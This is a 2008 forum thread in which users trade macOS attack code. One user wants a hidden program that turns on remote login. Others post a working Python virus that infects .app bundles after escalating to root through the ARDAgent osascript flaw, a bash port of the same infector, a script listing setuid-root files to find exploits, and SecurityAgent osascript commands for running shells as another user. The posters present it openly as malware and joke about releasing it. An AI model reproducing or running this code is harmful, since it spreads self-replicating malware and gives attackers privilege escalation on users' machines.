remote login Trojan, Trying to make a program that will select remote login. Options

[lokin]

******** EDIT Begins **********

6/25/08 EDIT *IMPORTANT* For Visitors:

The following links to our knowledge base contain further information on this subject, including Solutions, Discovery, Templates, and more:
ARDAgent exploit & Com.apple.SystemLoginItems.plist Exploit

- Spratt_

******** EDIT Complete **********


So the deal is I'm trying to write a script that will locate preferences--->sharing--->and then select remote login if there is write privileges.
This will be my first attempt at making something that does this so please give me a break.
what language should I use? perl?
what compiler? Xcode?
The program also has to run in the background or imbed it in a file or document of some kind.
Once again I have no experience here so please help all you can.
p.s. please don't write the code and say heres an example, I'll end up copying most of it.

[Siph0n]

Allright callmenames... you encouraged others to code stuff and so here we go. Virus in python that infects .app bundles... I don't have a mac so I can't debug... based on an earlier version by three authors who were bored and goofing off. And it does nothing... except maybe slow your system down from the additional workload.

CODE

#!/usr/bin/env python
# appvir.py by k, ny, reik
import sys, os, shutil

def infect():
    for path in os.popen('locate *.app'):
        path = path.rstrip()
        root, ext = os.path.splitext(path)
        path = os.path.join(path, 'Contents', 'MacOS', os.path.basename(root))
        ownedpath = '%s_owned' % path
        if not os.path.exists(ownedpath): # if no previous infection
            path_stats = os.lstat(path)
            shutil.move(path, ownedpath)
            shutil.copy(os.path.abspath(sys.argv[0]), path)
            os.chown(path, path_stats.st_uid, path_stats.st_gid)

if __name__ == '__main__':
    prog, args = os.path.abspath(sys.argv[0]), ' '.join(sys.argv[1:])
    if os.getuid():
        os.system('osascript -e \'tell app "ARDAgent" to do shell script' \
                  ' "\\\"%s\\\" %s &"\'' % (prog, args))
        if sys.argv[0].find('.app') > 0:
            os.system('"%s_owned" %s' % (prog, args))
    else:
        infect()

    # k, ny, reik

This post has been edited by Siph0n: Jun 22 2008, 05:17 AM

[callmenames]

Eeek! A virat and I think it's IN THE WILD! Can NO ONE save us from this threat? I'll just start porting that over to bash... What to do about the payload, hmmm, perhaps randomly fire-off some nice notes to Technology News Reporters. :)

[Oktane]

I don't think that exploit works with any other applications. Is their a specific way to look for exploits or is it more of a trip over it kinda thing.

[Siph0n]

Eeek! A virat and I think it's IN THE WILD! Can NO ONE save us from this threat? I'll just start porting that over to bash... What to do about the payload, hmmm, perhaps randomly fire-off some nice notes to Technology News Reporters. :)

Ssh... be vewy vewy qwiet... I'm hunting idiots :)

Sweet. Can't wait to see your bash version. Hopefully someone does a Perl version.. Ooo and maybe ObjC too, using spotlight.

[Oktane]

Maybe it can even be an inner specie virus designed to cross infect other operating systems. Hopping from linux to windows to Mac and back again. The Avian bird flu of computer viruses with a little less media attention and a lot less dead chinese. ;)

[callmenames]

Sweet. Can't wait to see your bash version.

Don't hold your breath, I have to overcome the issue with bash scripts not being directly executable from the GUI, I'm mulling it over... this is my starting point.

CODE

#!/bin/bash

declare    just_me="${0}" newline=$'\n' IFSold="${IFS}" IFS="${newline}"

function infect() {
find /Applications -iname "*.app" -type d -maxdepth 1 | while read the_path; do
inner_sanctum="${the_path}Contents/MacOS/$(basename ${the_path})"
inner_sanctum="${inner_sanctum%.app}"
[ -x "${inner_sanctum}_owned" ] && continue
mv "${inner_sanctum}" "${inner_sanctum}_owned"
cp "${all_of_me}" "${inner_sanctum}"
# Still need to chown/chgrp and touch dates back
done
}


if [ ! -x "${0}_owned" ]; then
    infect &
fi

[ -x "${0}_owned" ] && exec open "${0}_owned"

exit 0

I will likely proceed by using Platypus to generate an executable bundle, copy the Platypus bundle pieces into corresponding locations inside the app's bundle, rename the executable itself to match the app etc. not sure yet, must get COFFEE! :)

Hmm, I failed to consider what happens when a document is double-clicked to launch the corresponding app. Must have more coffee.

This post has been edited by callmenames: Jun 21 2008, 12:51 AM

[callmenames]

Is their a specific way to look for exploits or is it more of a trip over it kinda thing.

Some things are more likely than others although there are too many possibilities to narrow it down to a single area or type of issue. Here's a fun thing to try... you can use this little bash script...

CODE

#!/bin/bash
IFSold="${IFS}"
find "${1:-/Applications/}"  -user root -perm +4000 -print | while read filename; do
echo
    IFS="/"
    filename="${filename/\/\///}"
    items=( ${filename} )
    chain=""
    for (( i=0;i<${#items[*]};i++));do
        chain="${chain}${items[$i]}"
        ls -alod "${chain:-/}"
        chain="${chain}/"
    done
    IFS="${IFSold}"
done

Look closely at the permissions in the output.

[Macpunk]

I'm looking right now... and thanks for the reversing tutorials (http://mcscribble.com/projects.html) I just clicked on your sig and looked around.

Pfft, those suck. Well, they were a good start. I'm glad you found them useful. :-)

I want to expand them and add more info (common loop structures, other calling conventions, etc.), but I'm too lazy. Hell, I could add specific things like reversing Cocoa apps. But again, I'm too lazy. Maybe in the future...

@callmenames: Merh, I'm too involved with my latest project...

And both of you ought to hang out in IRC. You know the info, so you've got no excuse. ;-P

Also, I found out you could use this vulnerability to execute commands as securityagent through SecurtyAgent.app, but was unable to reproduce the bug outside of the interactive Python interpreter. Maybe one of you could have some fun:

CODE

osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'

Congrats to you both,
Macpunk

This post has been edited by Macpunk: Jun 21 2008, 02:22 AM

[callmenames]

Why thank you Macpunk! :) I make a ridiculously large number of mistakes, most of which I am unable to spot *until* I have posted something. Even with the time constraints on editing I am able to correct many, many mistakes in my posts before anyone sees them (hopefully.) In chat I do not have that opportunity and I generally come off somewhat more like this...

WHy tahnk yu mApunk! ): echo -n "I made a ridiculously large numper of stimakes,:<del> shit.. display dialog "most of which I am unable to sport &until* I is posted sum thing. \x07 That's the bell right? Even with time constraned editing I able to correct many, many mistrake before you see them.

Well, plus I tend to get easily sidetracked and people get alllllllll pisssy when you don't respond to them for hours or days at a time. :)

See, I had to edit this post too.

This post has been edited by callmenames: Jun 21 2008, 02:30 AM

[callmenames]

CODE

osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'

Yep, something's definitely up there but its rare and delicate and I can't quite pin it down...

Ooooh, got it I think...
Run this in Terminal

CODE

osascript -e 'tell app "SecurityAgent" to do shell script "osascript -e \"tell app \\\"SecurityAgent\\\" to do shell script \\\"id\\\"\""'

Just be very patient, it will take a minute or two to timeout.
Then immediately run this.

CODE

osascript -e 'tell app "SecurityAgent" to do shell script "id"'

Does that work for anybody else? I got...

CODE

uid=92(securityagent) gid=0(wheel) groups=0(wheel)

And now I can't reproduce it again. Sigh.

This post has been edited by callmenames: Jun 21 2008, 03:36 AM